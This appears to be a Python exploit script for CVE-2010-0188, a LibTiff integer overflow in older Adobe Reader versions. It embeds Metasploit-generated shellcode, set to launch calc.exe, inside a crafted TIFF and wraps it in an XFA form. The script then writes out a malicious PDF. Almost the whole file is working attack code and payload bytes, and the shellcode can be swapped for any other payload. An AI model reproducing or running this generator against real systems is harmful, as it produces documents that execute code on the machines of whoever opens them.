197 lines
No EOL
7.1 KiB
Python
Executable file
197 lines
No EOL
7.1 KiB
Python
Executable file
__doc__='''
|
|
|
|
Title: Adobe PDF LibTiff Integer Overflow Code Execution.
|
|
Product: Adobe Acrobat Reader
|
|
Version: <=8.3.0, <=9.3.0
|
|
CVE: 2010-0188
|
|
Author: villy (villys777 at gmail.com)
|
|
Site: http://bugix-security.blogspot.com/
|
|
Tested : succesfully tested on Adobe Reader 9.1/9.2/9.3 OS Windows XP(SP2,SP3)
|
|
------------------------------------------------------------------------
|
|
'''
|
|
import sys
|
|
import base64
|
|
import struct
|
|
import zlib
|
|
import StringIO
|
|
|
|
SHELLCODE_OFFSET=0x555
|
|
TIFF_OFSET=0x2038
|
|
|
|
# windows/exec - 227 bytes
|
|
# http://www.metasploit.com
|
|
# Encoder: x86/shikata_ga_nai
|
|
# EXITFUNC=process, CMD=calc.exe
|
|
buf = "\x2b\xc9\xd9\xc0\xd9\x74\x24\xf4\x5e\xb1\x33\xba\xd9\xb4"
|
|
buf += "\x0a\xbe\x31\x56\x15\x03\x56\x15\x83\x1f\xb0\xe8\x4b\x63"
|
|
buf += "\x51\x65\xb3\x9b\xa2\x16\x3d\x7e\x93\x04\x59\x0b\x86\x98"
|
|
buf += "\x29\x59\x2b\x52\x7f\x49\xb8\x16\xa8\x7e\x09\x9c\x8e\xb1"
|
|
buf += "\x8a\x10\x0f\x1d\x48\x32\xf3\x5f\x9d\x94\xca\x90\xd0\xd5"
|
|
buf += "\x0b\xcc\x1b\x87\xc4\x9b\x8e\x38\x60\xd9\x12\x38\xa6\x56"
|
|
buf += "\x2a\x42\xc3\xa8\xdf\xf8\xca\xf8\x70\x76\x84\xe0\xfb\xd0"
|
|
buf += "\x35\x11\x2f\x03\x09\x58\x44\xf0\xf9\x5b\x8c\xc8\x02\x6a"
|
|
buf += "\xf0\x87\x3c\x43\xfd\xd6\x79\x63\x1e\xad\x71\x90\xa3\xb6"
|
|
buf += "\x41\xeb\x7f\x32\x54\x4b\x0b\xe4\xbc\x6a\xd8\x73\x36\x60"
|
|
buf += "\x95\xf0\x10\x64\x28\xd4\x2a\x90\xa1\xdb\xfc\x11\xf1\xff"
|
|
buf += "\xd8\x7a\xa1\x9e\x79\x26\x04\x9e\x9a\x8e\xf9\x3a\xd0\x3c"
|
|
buf += "\xed\x3d\xbb\x2a\xf0\xcc\xc1\x13\xf2\xce\xc9\x33\x9b\xff"
|
|
buf += "\x42\xdc\xdc\xff\x80\x99\x13\x4a\x88\x8b\xbb\x13\x58\x8e"
|
|
buf += "\xa1\xa3\xb6\xcc\xdf\x27\x33\xac\x1b\x37\x36\xa9\x60\xff"
|
|
buf += "\xaa\xc3\xf9\x6a\xcd\x70\xf9\xbe\xae\x17\x69\x22\x1f\xb2"
|
|
buf += "\x09\xc1\x5f\x00"
|
|
|
|
class CVE20100188Exploit:
|
|
def __init__(self,shellcode):
|
|
self.shellcode = shellcode
|
|
self.tiff64=base64.b64encode(self.gen_tiff())
|
|
|
|
def gen_tiff(self):
|
|
tiff = '\x49\x49\x2a\x00'
|
|
tiff += struct.pack("<L", TIFF_OFSET)
|
|
|
|
tiff += '\x90' * (SHELLCODE_OFFSET)
|
|
tiff += self.shellcode
|
|
tiff += '\x90' * (TIFF_OFSET - 8 - len(buf) - SHELLCODE_OFFSET)
|
|
|
|
tiff += "\x07\x00\x00\x01\x03\x00\x01\x00"
|
|
tiff += "\x00\x00\x30\x20\x00\x00\x01\x01\x03\x00\x01\x00\x00\x00\x01\x00"
|
|
tiff += "\x00\x00\x03\x01\x03\x00\x01\x00\x00\x00\x01\x00\x00\x00\x06\x01"
|
|
tiff += "\x03\x00\x01\x00\x00\x00\x01\x00\x00\x00\x11\x01\x04\x00\x01\x00"
|
|
tiff += "\x00\x00\x08\x00\x00\x00\x17\x01\x04\x00\x01\x00\x00\x00\x30\x20"
|
|
tiff += "\x00\x00\x50\x01\x03\x00\xCC\x00\x00\x00\x92\x20\x00\x00\x00\x00"
|
|
tiff += "\x00\x00\x00\x0C\x0C\x08\x24\x01\x01\x00\xF7\x72\x00\x07\x04\x01"
|
|
tiff += "\x01\x00\xBB\x15\x00\x07\x00\x10\x00\x00\x4D\x15\x00\x07\xBB\x15"
|
|
tiff += "\x00\x07\x00\x03\xFE\x7F\xB2\x7F\x00\x07\xBB\x15\x00\x07\x11\x00"
|
|
tiff += "\x01\x00\xAC\xA8\x00\x07\xBB\x15\x00\x07\x00\x01\x01\x00\xAC\xA8"
|
|
tiff += "\x00\x07\xF7\x72\x00\x07\x11\x00\x01\x00\xE2\x52\x00\x07\x54\x5C"
|
|
tiff += "\x00\x07\xFF\xFF\xFF\xFF\x00\x01\x01\x00\x00\x00\x00\x00\x04\x01"
|
|
tiff += "\x01\x00\x00\x10\x00\x00\x40\x00\x00\x00\x31\xD7\x00\x07\xBB\x15"
|
|
tiff += "\x00\x07\x5A\x52\x6A\x02\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
|
|
tiff += "\x00\x07\x58\xCD\x2E\x3C\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
|
|
tiff += "\x00\x07\x05\x5A\x74\xF4\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
|
|
tiff += "\x00\x07\xB8\x49\x49\x2A\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
|
|
tiff += "\x00\x07\x00\x8B\xFA\xAF\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
|
|
tiff += "\x00\x07\x75\xEA\x87\xFE\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
|
|
tiff += "\x00\x07\xEB\x0A\x5F\xB9\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
|
|
tiff += "\x00\x07\xE0\x03\x00\x00\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
|
|
tiff += "\x00\x07\xF3\xA5\xEB\x09\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
|
|
tiff += "\x00\x07\xE8\xF1\xFF\xFF\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
|
|
tiff += "\x00\x07\xFF\x90\x90\x90\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
|
|
tiff += "\x00\x07\xFF\xFF\xFF\x90\x4D\x15\x00\x07\x31\xD7\x00\x07\x2F\x11"
|
|
tiff += "\x00\x07"
|
|
return tiff
|
|
|
|
|
|
def gen_xml(self):
|
|
xml= '''<?xml version="1.0" encoding="UTF-8" ?>
|
|
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
|
|
<config xmlns="http://www.xfa.org/schema/xci/1.0/">
|
|
<present>
|
|
<pdf>
|
|
<version>1.65</version>
|
|
<interactive>1</interactive>
|
|
<linearized>1</linearized>
|
|
</pdf>
|
|
<xdp>
|
|
<packets>*</packets>
|
|
</xdp>
|
|
<destination>pdf</destination>
|
|
</present>
|
|
</config>
|
|
<template baseProfile="interactiveForms" xmlns="http://www.xfa.org/schema/xfa-template/2.4/">
|
|
<subform name="topmostSubform" layout="tb" locale="en_US">
|
|
<pageSet>
|
|
<pageArea id="PageArea1" name="PageArea1">
|
|
<contentArea name="ContentArea1" x="0pt" y="0pt" w="612pt" h="792pt" />
|
|
<medium short="612pt" long="792pt" stock="custom" />
|
|
</pageArea>
|
|
</pageSet>
|
|
<subform name="Page1" x="0pt" y="0pt" w="612pt" h="792pt">
|
|
<break before="pageArea" beforeTarget="#PageArea1" />
|
|
<bind match="none" />
|
|
<field name="ImageField1" w="28.575mm" h="1.39mm" x="37.883mm" y="29.25mm">
|
|
<ui>
|
|
<imageEdit />
|
|
</ui>
|
|
</field>
|
|
<?templateDesigner expand 1?>
|
|
</subform>
|
|
<?templateDesigner expand 1?>
|
|
</subform>
|
|
<?templateDesigner FormTargetVersion 24?>
|
|
<?templateDesigner Rulers horizontal:1, vertical:1, guidelines:1, crosshairs:0?>
|
|
<?templateDesigner Zoom 94?>
|
|
</template>
|
|
<xfa:datasets xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/">
|
|
<xfa:data>
|
|
<topmostSubform>
|
|
<ImageField1 xfa:contentType="image/tif" href="">'''+self.tiff64 +'''</ImageField1>
|
|
</topmostSubform>
|
|
</xfa:data>
|
|
</xfa:datasets>
|
|
<PDFSecurity xmlns="http://ns.adobe.com/xtd/" print="1" printHighQuality="1" change="1" modifyAnnots="1" formFieldFilling="1" documentAssembly="1" contentCopy="1" accessibleContent="1" metadata="1" />
|
|
<form checksum="a5Mpguasoj4WsTUtgpdudlf4qd4=" xmlns="http://www.xfa.org/schema/xfa-form/2.8/">
|
|
<subform name="topmostSubform">
|
|
<instanceManager name="_Page1" />
|
|
<subform name="Page1">
|
|
<field name="ImageField1" />
|
|
</subform>
|
|
<pageSet>
|
|
<pageArea name="PageArea1" />
|
|
</pageSet>
|
|
</subform>
|
|
</form>
|
|
</xdp:xdp>
|
|
|
|
'''
|
|
return xml
|
|
|
|
def gen_pdf(self):
|
|
xml = zlib.compress(self.gen_xml())
|
|
pdf='''%PDF-1.6
|
|
1 0 obj
|
|
<</Filter /FlateDecode/Length ''' + str(len(xml)) + '''/Type /EmbeddedFile>>
|
|
stream
|
|
''' + xml+'''
|
|
endstream
|
|
endobj
|
|
2 0 obj
|
|
<</V () /Kids [3 0 R] /T (topmostSubform[0]) >>
|
|
endobj
|
|
3 0 obj
|
|
<</Parent 2 0 R /Kids [4 0 R] /T (Page1[0])>>
|
|
endobj
|
|
4 0 obj
|
|
<</MK <</IF <</A [0.0 1.0]>>/TP 1>>/P 5 0 R/FT /Btn/TU (ImageField1)/Ff 65536/Parent 3 0 R/F 4/DA (/CourierStd 10 Tf 0 g)/Subtype /Widget/Type /Annot/T (ImageField1[0])/Rect [107.385 705.147 188.385 709.087]>>
|
|
endobj
|
|
5 0 obj
|
|
<</Rotate 0 /CropBox [0.0 0.0 612.0 792.0]/MediaBox [0.0 0.0 612.0 792.0]/Resources <</XObject >>/Parent 6 0 R/Type /Page/PieceInfo null>>
|
|
endobj
|
|
6 0 obj
|
|
<</Kids [5 0 R]/Type /Pages/Count 1>>
|
|
endobj
|
|
7 0 obj
|
|
<</PageMode /UseAttachments/Pages 6 0 R/MarkInfo <</Marked true>>/Lang (en-us)/AcroForm 8 0 R/Type /Catalog>>
|
|
endobj
|
|
8 0 obj
|
|
<</DA (/Helv 0 Tf 0 g )/XFA [(template) 1 0 R]/Fields [2 0 R]>>
|
|
endobj xref
|
|
trailer
|
|
<</Root 7 0 R/Size 9>>
|
|
startxref
|
|
14765
|
|
%%EOF'''
|
|
return pdf
|
|
|
|
|
|
if __name__=="__main__":
|
|
print __doc__
|
|
if len(sys.argv) != 2:
|
|
print "Usage: %s [output.pdf]" % sys.argv[0]
|
|
|
|
print "Creating Exploit to %s\n"% sys.argv[1]
|
|
exploit=CVE20100188Exploit(buf)
|
|
f = open(sys.argv[1],mode='wb')
|
|
f.write(exploit.gen_pdf())
|
|
f.close()
|
|
print "[+] done !" |